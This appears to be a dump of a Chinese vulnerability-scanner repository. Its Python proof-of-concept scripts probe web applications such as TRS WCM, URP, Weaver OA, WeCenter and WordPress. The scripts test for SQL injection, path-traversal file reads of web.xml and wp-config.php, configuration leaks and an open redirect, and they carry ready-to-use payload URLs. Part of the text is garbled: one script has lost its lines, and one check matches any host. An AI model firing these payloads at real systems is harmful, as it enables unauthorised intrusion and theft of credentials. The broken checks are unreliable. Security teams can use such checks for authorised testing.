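                cprint("[+]存在TRS was5 download_templet.jsp任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")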
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    trs_was5_download_templet_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_wcm_infoview_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS wcm 6.x版本infoview信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2012-012957
6 | author: Lucifer
7 | description: 文件infoview.do中导致信息泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
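class trs_wcm_infoview_disclosure_BaseVerify:
    """Check one host for the TRS WCM 6.x infoview.do information disclosure.

    Requests the `getOnlineUsers` method of the `wcm6_user` service through
    /wcm/infoview.do and inspects the response body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding or a connection error."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers"
        vulnurl = self.url + payload
        try:
            # verify=False skips TLS certificate validation, so the inspected
            # body is not authenticated as coming from the intended host.
            resp = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): both markers are empty strings in this listing, so
            # the test is true for every response and any reachable host is
            # reported. The original markers look lost in extraction; restore
            # them from the upstream file before trusting this result.
            if r"" in resp.text and r"" in resp.text:
                cprint("[+]存在TRS wcm 6.x版本infoview信息泄露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
        except Exception:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt and
            # SystemExit. Every failure is still printed with the timeout text.
            cprint("[-] "+__file__+"====>连接超时", "cyan")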
31 |
if __name__ == "__main__":
    # Script entry point: argv[1] is the base URL handed to the check.
    # The blanket filter hides every warning, including the one requests
    # emits when verify=False is used.
    warnings.filterwarnings("ignore")
    trs_wcm_infoview_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_wcm_pre_as_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS wcm pre.as 文件包含
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0120447
6 | author: Lucifer
7 | description: 文件common/pre.as中,参数_url未过滤存在文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class trs_wcm_pre_as_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/common/pre.as?_url=/WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = trs_wcm_pre_as_lfi_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/cms/trs/trs_wcm_service_writefile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: TRS wcm webservice文件写入漏洞
5 | referer: https://www.secpulse.com/archives/18044.html
6 | author: Lucifer
7 | description: 拓尔思wcm系统webservice有两处操作可任意写入webshell。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
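class trs_wcm_service_writefile_BaseVerify:
    """Check whether a TRS WCM host exposes the templateservicefacade WSDL.

    The check only reads the service description and looks for two operation
    names; it does not call either operation.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Fetch the WSDL and print a high-severity finding if both names appear."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wcm/services/trs:templateservicefacade?wsdl"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # A match shows the service description is reachable without
            # authentication; it does not show that a write would succeed.
            if r"writeFile" in req.text and r"writeSpecFile" in req.text:
                cprint("[+]存在拓尔思 wcm webservice文件写入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = trs_wcm_service_writefile_BaseVerify(sys.argv[1])
    testVuln.run()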
36 |
--------------------------------------------------------------------------------
/pocs/cms/typecho/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/typecho/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/umail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/umail/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/uniportal/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/uniportal/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/urp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/urp/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/urp/urp_ReadJavaScriptServlet_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: URP综合教务系统任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-054350
6 | author: Lucifer
7 | description: 文件com.runqian.base.util.ReadJavaScriptServlet中,参数file存在任意文件读取。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
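class urp_ReadJavaScriptServlet_fileread_BaseVerify:
    """Check a URP academic system for the ReadJavaScriptServlet file read.

    Sends one GET whose ``file`` parameter points at ``WEB-INF/web.xml`` and
    judges the result by the response Content-Type only.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get() instead of indexing: a response without a Content-Type
            # header used to raise KeyError and be reported as a timeout.
            # NOTE(review): the header alone is weak evidence (any XML reply
            # matches, and a value with a charset suffix does not).
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在URP综合教务系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = urp_ReadJavaScriptServlet_fileread_BaseVerify(sys.argv[1])
    testVuln.run()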
--------------------------------------------------------------------------------
/pocs/cms/urp/urp_query.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: urp查询接口曝露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-025424
6 | author: Lucifer
7 | description: urp查询接口未设置权限,可以越权查询任意学生信息,照片,成绩等
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
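class urp_query_BaseVerify:
    """Check whether a URP host serves its score-report page without a login.

    Sends one GET to ``/reportFiles/cj/cj_zwcjd.jsp`` and looks for the
    transcript marker text in the body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a medium-severity finding on a match."""
        payload = "/reportFiles/cj/cj_zwcjd.jsp"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, timeout=10, verify=False)

            if r"成绩单" in req.text:
                cprint("[+]存在urp查询接口曝露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = urp_query_BaseVerify(sys.argv[1])
    testVuln.run()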
34 |
--------------------------------------------------------------------------------
/pocs/cms/urp/urp_query2.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: URP越权查看任意学生课表、成绩(需登录)
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-099950
6 | author: Lucifer
7 | description: 系统存在一个越权漏洞,登录之后可以通过姓名或学号查看任意学生成绩和课表。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
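class urp_query2_BaseVerify:
    """Check a URP host for the leftover ``/test1.jsp`` page.

    Sends one GET to ``/test1.jsp`` and looks for a reference to
    ``jmglAction.do`` in the body. The second URL is printed, not requested.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print two medium-severity lines on a match."""
        payload = "/test1.jsp"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, timeout=10, verify=False)

            if r"jmglAction.do" in req.text:
                cprint("[+]存在URP越权查看任意学生课表、成绩(需登录)漏洞...(中危)\tpayload: "+vulnurl, "yellow")
                # Reported for follow-up only; this URL is never fetched here.
                cprint("[+]存在URP越权查看任意学生课表、成绩(需登录)漏洞...(中危)\tpayload: "+self.url+"/jmglAction.do?oper=xsmdcx", "yellow")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = urp_query2_BaseVerify(sys.argv[1])
    testVuln.run()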
35 |
--------------------------------------------------------------------------------
/pocs/cms/v2tech/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/v2tech/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/v2tech/v2Conference_sqli_xxe.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: V2视频会议系统某处SQL注射、XXE漏洞(可getshell)
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0143276
6 | author: Lucifer
7 | description: 威速V2视频会议系统存在Union注入和XXE漏洞,可GETSHELL。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
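class v2Conference_sqli_xxe_BaseVerify:
    """Check a V2 Conference host for SQL injection in bulletinAction.do.

    Sends one GET with a fixed ``sysId`` value and looks for the MD5 of
    ``1234`` in the body. Only the SQL injection is checked; no XXE request
    is made by this class.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }

        vulnurl = self.url + r"/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20UnIoN%20SeLeCt%201,Md5(1234),3,Md5(1234),5%23"
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"); it appears only if the database
            # evaluated the expression from the query string.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在V2 ConferenceSQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = v2Conference_sqli_xxe_BaseVerify(sys.argv[1])
    testVuln.run()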
--------------------------------------------------------------------------------
/pocs/cms/viewgood/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/viewgood/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/viewgood/viewgood_GetCaption_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 远古流媒体系统 GetCaption.ashx注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件GetCaption.ashx中,参数CaptionType存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
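class viewgood_GetCaption_sqli_BaseVerify:
    """Check a VIEWGOOD streaming host for SQL injection in GetCaption.ashx.

    Sends one GET with a fixed ``CaptionType`` value and looks for the marker
    ``tyqMicrosoft`` in the body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1%27AnD%201%3DConVert%28Int%2C%28Char%28116%29%252bChar%28121%29%252bChar%28113%29%252b@@Version%29%29--&AssetID=1&CaptionName=11"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Presumably the marker comes back inside a database error message;
            # a hit also means the server leaks raw SQL errors to clients.
            if r"tyqMicrosoft" in req.text:
                cprint("[+]存在远古流媒体系统 GetCaption.ashx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = viewgood_GetCaption_sqli_BaseVerify(sys.argv[1])
    testVuln.run()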
--------------------------------------------------------------------------------
/pocs/cms/weaver_oa/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/weaver_oa/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/weaver_oa/weaver_oa_db_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA 数据库配置泄露
5 | referer: http://www.loner.fm/bugs/bug_detail.php?wybug_id=wooyun-2014-087500
6 | author: Lucifer
7 | description: mysql_config.ini泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
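class weaver_oa_db_disclosure_BaseVerify:
    """Check whether a Weaver OA host serves ``/mysql_config.ini`` publicly.

    Sends one GET and looks for the key name ``datapassword`` in the body.
    The file content itself is not printed or stored.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/mysql_config.ini"
        vulnurl = self.url + payload

        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"datapassword" in req.text:
                cprint("[+]存在泛微OA 数据库配置泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = weaver_oa_db_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()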
--------------------------------------------------------------------------------
/pocs/cms/weaver_oa/weaver_oa_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA downfile.php 任意文件下载漏洞
5 | referer:
6 | author: Lucifer
7 | description: fileid参数引起的布尔盲注。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
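class weaver_oa_filedownload_BaseVerify:
    """Check a Weaver OA host for the E-mobile ``downfile.php`` file download.

    Sends one GET to ``downfile.php`` with a placeholder ``url`` value and
    looks for a ``No error in ...`` message in a 200 response.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/E-mobile/Data/downfile.php?url=123"
        vulnurl = self.url + payload
        try:
            # Fix: the request used to go to self.url, leaving vulnurl unused,
            # so downfile.php was never queried and the verdict was based on
            # the site's landing page. The finding now names the URL fetched.
            # verify=False skips certificate validation; confirm hits by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if req.status_code == 200:
                m = re.search(r'No error in ([^<]+)', req.text)
                if m:
                    cprint("[+]存在泛微OA downfile.php 任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = weaver_oa_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()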
--------------------------------------------------------------------------------
/pocs/cms/wecenter/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/wecenter/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/wecenter/wecenter_topic_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wecenter SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0106369
6 | author: Lucifer
7 | description: 文件explore/UPLOAD/?/topic/ajax/question_list中,参数topic_id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
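class wecenter_topic_id_sqli_BaseVerify:
    """Check a WeCenter host for SQL injection in the ``topic_id`` parameter.

    Sends one GET to the ``question_list`` endpoint and looks for the MD5 of
    ``1234`` in the body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/explore/UPLOAD/?/topic/ajax/question_list/type-best&topic_id=1%29UnIoN/**/SeLeCt/**/Md5(1234)%23"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"); it appears only if the database
            # evaluated the expression from the query string.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在wecenter SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = wecenter_topic_id_sqli_BaseVerify(sys.argv[1])
    testVuln.run()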
--------------------------------------------------------------------------------
/pocs/cms/weway/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/weway/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/weway/weway_PictureView1_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 任我行crm任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0134737
6 | author: Lucifer
7 | description: 文件Common/PictureView1中,参数picurl存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
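class weway_PictureView1_filedownload_BaseVerify:
    """Check a Weway CRM host for the PictureView1 arbitrary file download.

    Sends one GET whose ``picurl`` parameter points at ``/web.config`` and
    judges the result by the response Content-Type only.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/crm/Common/PictureView1/?picurl=/web.config"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get() instead of indexing: a response without a Content-Type
            # header used to raise KeyError and be reported as a timeout.
            # NOTE(review): the header alone is weak evidence (any XML reply
            # matches, and a value with a charset suffix does not).
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在任我行crm任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = weway_PictureView1_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()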
--------------------------------------------------------------------------------
/pocs/cms/wizbank/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/wizbank/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/wizbank/wizbank_download_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇思学习管理系统任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0149619
6 | author: Lucifer
7 | description: \www\cw\skin1\jsp\download.jsp源码中,未经过文件类型检查和过滤,直接下载文件
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
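class wizbank_download_filedownload_BaseVerify():
    """Check a wizBank LMS host for the ``download.jsp`` arbitrary file download.

    Sends one GET whose ``file`` parameter points at ``/WEB-INF/web.xml`` and
    judges the result by the response Content-Type only.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # .get() instead of indexing: a response without a Content-Type
            # header used to raise KeyError and be reported as a timeout.
            # NOTE(review): the header alone is weak evidence (any XML reply
            # matches, and a value with a charset suffix does not).
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在wizbank学习管理系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = wizbank_download_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()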
--------------------------------------------------------------------------------
/pocs/cms/wordpress/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/wordpress/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/wordpress/wordpress_admin_ajax_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress admin-ajax.php任意文件下载
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件admin-ajax.php中,参数img存在任意文件下载漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
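class wordpress_admin_ajax_filedownload_BaseVerify:
    """Check a WordPress host for the ``revslider_show_image`` file download.

    Sends one GET to ``admin-ajax.php`` whose ``img`` parameter points at
    ``../wp-config.php`` and looks for two configuration constant names.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
        """Request the probe URL and print a high-severity finding on a match."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
        vulnurl = self.url + payload
        try:
            # verify=False skips certificate validation, so the response is
            # unauthenticated; confirm any hit by hand.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # A hit means the response carried database settings; the body is
            # neither printed nor stored by this check.
            if r"DB_NAME" in req.text and r"DB_USER" in req.text:
                cprint("[+]存在wordpress admin-ajax.php任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare `except:`, which also caught KeyboardInterrupt and
            # SystemExit. The message says "connection timed out" for any error.
            cprint("[-] "+__file__+"====>连接超时", "cyan")


if __name__ == "__main__":
    # Silences all warnings, including the InsecureRequestWarning that
    # verify=False triggers.
    warnings.filterwarnings("ignore")
    testVuln = wordpress_admin_ajax_filedownload_BaseVerify(sys.argv[1])
    testVuln.run()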
--------------------------------------------------------------------------------
/pocs/cms/wordpress/wordpress_url_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress插件跳转
5 | referer: unknown
6 | author: Lucifer
7 | description: feed-statistics.php中参数url未经过验证可跳转任意网站。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
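class wordpress_url_redirect_BaseVerify:
    """Check the wordpress-feed-statistics plugin for an open redirect.

    Sends one GET to ``feed-statistics.php`` with a base64-encoded ``url``
    value and looks for ``www.baidu.com`` in the final response body.
    """

    def __init__(self, url):
        # Base URL of the host under test; the probe path is appended as-is.
        self.url = url

    def run(self):
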